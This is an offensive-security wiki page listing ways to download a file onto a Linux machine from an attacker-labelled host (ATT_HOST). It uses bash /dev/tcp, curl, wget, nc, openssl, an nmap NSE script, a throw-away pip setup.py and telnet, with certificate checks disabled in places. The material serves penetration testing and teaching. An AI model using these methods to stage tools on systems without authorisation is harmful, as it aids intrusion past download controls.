DL_ _Lin_ _Terminal - lighthouseitsecurity/barabbas GitHub Wiki

File Download ➔ Linux ➔ Terminal

OVERVIEW:

(identify supported options - Linux - file download - terminal)

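# List which download-capable tools are installed: for each candidate name,
# print every matching executable found in the usual binary directories.
tools=("bash" "curl" "lwp-download" "nc" "nc.traditional" "nmap" "openssl" "pip" "*telnet" "wget")
echo '[*] teminal - file download - available options'
# Quote the expansion so "*telnet" reaches find as a -name pattern instead of
# being globbed by the shell against files in the current directory.
for tool in "${tools[@]}"; do
  echo "   [*] $tool"
  # Unreadable directories are expected for an unprivileged user; hide that noise.
  find /etc /bin /usr/bin /usr/lib /usr/sbin /usr/local/bin /usr/local/lib /usr/local/sbin /opt \
    -type f -executable -name "$tool" 2>/dev/null
  echo ''
done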

bash (HTTP)

https://www.gnu.org/software/bash/

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters. They are exported because the download step runs in a
# child bash process that reads them from its environment.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

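# Plain-HTTP download using only bash. /dev/tcp is a bash redirection feature,
# so the transfer runs in an explicit bash child that reads the exported
# ATT_* and RFILE variables from its environment.
bash -c '
  cr=$(printf "\r")   # a line holding only CR marks the end of the headers
  {
    # Send the HTTP/1.0 request on fd 3 (the socket), then read the reply back.
    printf "GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" "$ATT_PATH$RFILE" "$ATT_HOST:$ATT_PORT" 1>&3
    cat 0<&3
  } 3<>"/dev/tcp/$ATT_HOST/$ATT_PORT" | {
    # Discard the status line and headers; everything after them is the body.
    while IFS= read -r line; do
      [ "$line" = "$cr" ] && break
    done
    cat
  } > "$PWD/$RFILE"
'
# The HTTP status is never checked, so an error page would be saved as the
# file. Compare this digest with the one computed on the server; md5sum catches
# transfer corruption, use sha256sum on both ends if tampering is a concern.
md5sum "$PWD/$RFILE"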

NOTE: this method does not work with HTTP/1.1

curl (HTTP; HTTPS)

https://linux.die.net/man/1/curl

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the download URL in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

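# Fetch the file over plain HTTP and print its MD5 for comparison with the
# digest computed on the server.
# --fail makes curl exit non-zero on an HTTP error (e.g. 404) instead of saving
# the error page as the file, so md5sum only runs on a real download.
curl --fail "http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE" -o "$PWD/$RFILE" \
  && md5sum "$PWD/$RFILE"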

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the HTTPS download URL in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='443'            # TCP port of the HTTPS server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

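# Fetch the file over HTTPS and print its MD5.
# -k skips certificate validation, so the server is not authenticated and the
# digest comparison with the server-side hash is the only integrity check left.
# For a self-signed server, --cacert <server-cert.pem> in place of -k keeps
# validation on.
# --fail stops curl from saving an HTTP error page as the file.
curl --fail -k "https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE" -o "$PWD/$RFILE" \
  && md5sum "$PWD/$RFILE"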

NOTE: -k disables X.509 certificate validation

lwp-download (HTTP)

https://linux.die.net/man/1/lwp-download

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the download URL in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

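# Fetch the file over plain HTTP with lwp-download and print its MD5 for
# comparison with the digest computed on the server.
# Quoting keeps the URL and target path intact if a parameter contains spaces
# or glob characters; md5sum runs only when the download command succeeded.
lwp-download "http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE" "$PWD/$RFILE" \
  && md5sum "$PWD/$RFILE"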

nc/nc.traditional (HTTP)

https://linux.die.net/man/1/nc

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the raw HTTP request in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

(nc)

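# Send a hand-written HTTP request through nc and save the response body.
# printf '%s' keeps backslashes in the parameters literal (echo -e would
# interpret them).
printf 'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n' "$ATT_PATH$RFILE" "$ATT_HOST:$ATT_PORT" \
  | nc "$ATT_HOST" "$ATT_PORT" \
  | {
      # Drop everything up to the blank CRLF line that ends the headers. A fixed
      # "tail -n +8" only works when the server sends exactly seven header
      # lines; any other count corrupts the saved file.
      while IFS= read -r line; do
        [ "$line" = $'\r' ] && break
      done
      cat
    } > "$PWD/$RFILE"
# The HTTP status is not checked; compare this digest with the server-side one.
md5sum "$PWD/$RFILE"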

(nc.traditional)

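# Send a hand-written HTTP request through nc.traditional and save the
# response body. printf '%s' keeps backslashes in the parameters literal
# (echo -e would interpret them).
printf 'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n' "$ATT_PATH$RFILE" "$ATT_HOST:$ATT_PORT" \
  | nc.traditional "$ATT_HOST" "$ATT_PORT" \
  | {
      # Drop everything up to the blank CRLF line that ends the headers. A fixed
      # "tail -n +8" only works when the server sends exactly seven header
      # lines; any other count corrupts the saved file.
      while IFS= read -r line; do
        [ "$line" = $'\r' ] && break
      done
      cat
    } > "$PWD/$RFILE"
# The HTTP status is not checked; compare this digest with the server-side one.
md5sum "$PWD/$RFILE"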

nmap (HTTP/HTTPS)

https://linux.die.net/man/1/nmap

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters for the nmap http-fetch download in the next step.
ATT_HOST='192.168.5.11'   # host that nmap connects to
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix (the nmap command on this page passes only RFILE)
RFILE='testfile_1MB'      # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

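# Download with the http-fetch NSE script into a fresh temporary directory.
# mktemp -d creates an unpredictable, owner-only directory and TF holds its
# path; nmap is started only if that directory was actually created.
# The script arguments are passed as one quoted word so a space or glob
# character in RFILE cannot split them.
TF=$(mktemp -d) \
  && nmap -p "$ATT_PORT" "$ATT_HOST" --script http-fetch \
       --script-args "http-fetch.destination=$TF,http-fetch.url=$RFILE"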

4. [CLIENT] move file to current directory

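# Move the fetched file out of the temporary directory created in step 3 (TF),
# print its MD5 and remove that directory.
# Only TF is searched: looking through all of /tmp by file name can match a
# stale or foreign file of the same name, and the directory removed afterwards
# would then be derived from that match.
if [ -n "${TF:-}" ] && [ -d "$TF" ]; then
  tmp_dl_dir=$TF
  # http-fetch stores the file in subdirectories of its destination, hence find.
  tmp_dl_file=$(find "$tmp_dl_dir" -type f -name "$RFILE" 2>/dev/null | head -n 1)
  if [ -n "$tmp_dl_file" ] && mv -- "$tmp_dl_file" "$PWD/$RFILE"; then
    md5sum "$PWD/$RFILE"
    rm -rf -- "$tmp_dl_dir"
  else
    echo "[-] $RFILE not found under $tmp_dl_dir" >&2
  fi
else
  echo "[-] TF is not set; run the download step first" >&2
fi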

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters for the nmap http-fetch download over HTTPS.
ATT_HOST='192.168.5.11'   # host that nmap connects to
ATT_PORT='443'            # TCP port of the HTTPS server
ATT_PATH='/'              # URL path prefix (the nmap command on this page passes only RFILE)
RFILE='testfile_1MB'      # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

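# Download over HTTPS with the http-fetch NSE script into a fresh temporary
# directory. mktemp -d creates an unpredictable, owner-only directory and TF
# holds its path; nmap is started only if that directory was actually created.
# NOTE(review): the page states this works with self-signed certificates, so
# the server is presumably not authenticated - verify the file hash afterwards.
TF=$(mktemp -d) \
  && nmap -p "$ATT_PORT" "$ATT_HOST" --script http-fetch \
       --script-args "http-fetch.destination=$TF,http-fetch.url=$RFILE"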

NOTE: works with self-signed X.509 certificates

4. [CLIENT] move file to current directory

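# Move the fetched file out of the temporary directory created in step 3 (TF),
# print its MD5 and remove that directory.
# Only TF is searched: looking through all of /tmp by file name can match a
# stale or foreign file of the same name, and the directory removed afterwards
# would then be derived from that match.
if [ -n "${TF:-}" ] && [ -d "$TF" ]; then
  tmp_dl_dir=$TF
  # http-fetch stores the file in subdirectories of its destination, hence find.
  tmp_dl_file=$(find "$tmp_dl_dir" -type f -name "$RFILE" 2>/dev/null | head -n 1)
  if [ -n "$tmp_dl_file" ] && mv -- "$tmp_dl_file" "$PWD/$RFILE"; then
    md5sum "$PWD/$RFILE"
    rm -rf -- "$tmp_dl_dir"
  else
    echo "[-] $RFILE not found under $tmp_dl_dir" >&2
  fi
else
  echo "[-] TF is not set; run the download step first" >&2
fi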

openssl (HTTPS)

https://linux.die.net/man/1/openssl

TESTED ON: Kali 2023.2

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the raw HTTPS request in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='443'            # TCP port of the HTTPS server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

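# Send a hand-written HTTP request through a TLS connection opened by
# openssl s_client and save the response body.
# s_client carries on after a certificate verification failure unless
# -verify_return_error is given, so the server is not authenticated here and
# the digest comparison is the only integrity check.
printf 'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n' "$ATT_PATH$RFILE" "$ATT_HOST:$ATT_PORT" \
  | openssl s_client -quiet -connect "$ATT_HOST:$ATT_PORT" \
  | {
      # Drop everything up to the blank CRLF line that ends the headers. A fixed
      # "tail -n +8" only works when the server sends exactly seven header
      # lines; any other count corrupts the saved file.
      while IFS= read -r line; do
        [ "$line" = $'\r' ] && break
      done
      cat
    } > "$PWD/$RFILE"
# The HTTP status is not checked; compare this digest with the server-side one.
md5sum "$PWD/$RFILE"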

NOTES:

  • works with self-signed X.509 certificates
  • upon download, an error will appear in stdout, which can be ignored (i.e. file successfully downloaded)

pip (HTTP)

https://pip.pypa.io/en/stable/cli/pip_install/

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters. They are exported because the setup.py written in the
# next step reads RFILE (and the derived URL) from the environment.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

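# Download by letting pip execute a throw-away setup.py: "pip install <dir>"
# runs the setup.py found in that directory, and this one only calls
# urlretrieve with the exported URL and RFILE.
export URL="http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE"
# mktemp -d creates an unpredictable, owner-only directory; nothing is written
# or installed if it could not be created.
TF=$(mktemp -d) && {
  echo 'import sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["RFILE"])' > "$TF/setup.py"
  # setup.py never calls setup(), so pip reports an error after the download.
  pip install "$TF"
}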

4. [CLIENT] move file to current directory

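# Move the downloaded file out of the temporary directory created in step 3
# (TF), print its MD5 and remove that directory.
# TF is used directly: searching /tmp for any setup.py can return several
# matches or one that belongs to another run, and the path moved from and then
# removed would be derived from that output.
if [ -n "${TF:-}" ] && [ -f "$TF/$RFILE" ]; then
  tmp_dl_dir=$TF
  mv -- "$tmp_dl_dir/$RFILE" "$PWD/$RFILE" && md5sum "$PWD/$RFILE"
  rm -rf -- "$tmp_dl_dir"
else
  echo "[-] $RFILE not found in the step 3 directory; run the download step first" >&2
fi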

NOTE: upon download, an error will appear in stdout, which can be ignored (i.e. file successfully downloaded)

  • file downloaded in two locations in /tmp

telnet (HTTP)

https://linux.die.net/man/1/telnet

TESTED ON: Kali 2023.2

(HTTP)

1. [SERVER] base64-encode target file

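# Server side: write a base64 copy of the file as one unwrapped line (-w0).
# The client-side step keeps only the last line of the telnet output, so the
# whole encoded file must sit on a single line.
export LFILE="testfile_200MB"
# base64 reads the file itself (no cat needed); quoting and "--" keep names
# with spaces or a leading dash from being misparsed.
base64 -w0 -- "$LFILE" > "${LFILE}.b64"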

2. [CLIENT] open terminal session

(open terminal window)

3. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the raw HTTP request in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # file name; the request asks for RFILE with a .b64 suffix
export ATT_HOST ATT_PORT ATT_PATH RFILE

4. [CLIENT] download base64-encoded file

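# Request the base64 copy of the file through telnet and keep only the last
# line of the output, which is the single-line base64 body.
# The sleeps give telnet time to connect before the request is written and
# time to receive the reply before its input closes.
# bash needs a ';' or newline before the closing '}'; the one-line form
# "sleep 3 }" is a syntax error there.
{
  sleep 3
  echo -e "GET $ATT_PATH$RFILE.b64 HTTP/1.1\nHost: $ATT_HOST:$ATT_PORT\n\n"
  sleep 3
} | telnet "$ATT_HOST" "$ATT_PORT" | tail -n 1 > "$PWD/$RFILE.b64"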

NOTES:

  • the target file is base64-encoded due to bash issues (null byte transmission)
  • adjust sleep timers, if needed (depending on environment and file size)

5. [CLIENT] base64-decode file

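# Decode the transferred base64 file, then print the MD5 of the result for
# comparison with the digest of the original file on the server.
# The decoded bytes must be redirected into the target: "base64 -d FILE" reads
# FILE as its input, so naming the target as an operand never creates it.
# The encoded copy is deleted only after decoding succeeded.
base64 -d "$PWD/$RFILE.b64" > "$PWD/$RFILE" \
  && rm -- "$PWD/$RFILE.b64"
md5sum "$PWD/$RFILE"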

wget (HTTP; HTTPS)

https://linux.die.net/man/1/wget

TESTED ON: Kali 2023.2

(HTTP)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the download URL in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='80'             # TCP port of the HTTP server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

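# Fetch the file over plain HTTP with wget and print its MD5 for comparison
# with the digest computed on the server.
# md5sum runs only when wget succeeded; after a failed request -O can leave an
# empty or partial file behind, and hashing that would look like a result.
wget "http://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE" -O "$PWD/$RFILE" \
  && md5sum "$PWD/$RFILE"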

(HTTPS)

1. [CLIENT] open terminal session

(open terminal window)

2. [CLIENT] specify file transfer parameters

# Transfer parameters used to build the HTTPS download URL in the next step.
ATT_HOST='192.168.5.11'   # host the file is requested from
ATT_PORT='443'            # TCP port of the HTTPS server
ATT_PATH='/'              # URL path prefix, placed directly before RFILE
RFILE='testfile_200MB'    # remote file name, also used as the local file name
export ATT_HOST ATT_PORT ATT_PATH RFILE

3. [CLIENT] download file

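# Fetch the file over HTTPS with wget and print its MD5.
# --no-check-certificate skips certificate validation, so the server is not
# authenticated and the digest comparison with the server-side hash is the only
# integrity check left. For a self-signed server,
# --ca-certificate=<server-cert.pem> in place of it keeps validation on.
# md5sum runs only when wget succeeded.
wget --no-check-certificate "https://$ATT_HOST:$ATT_PORT$ATT_PATH$RFILE" -O "$PWD/$RFILE" \
  && md5sum "$PWD/$RFILE"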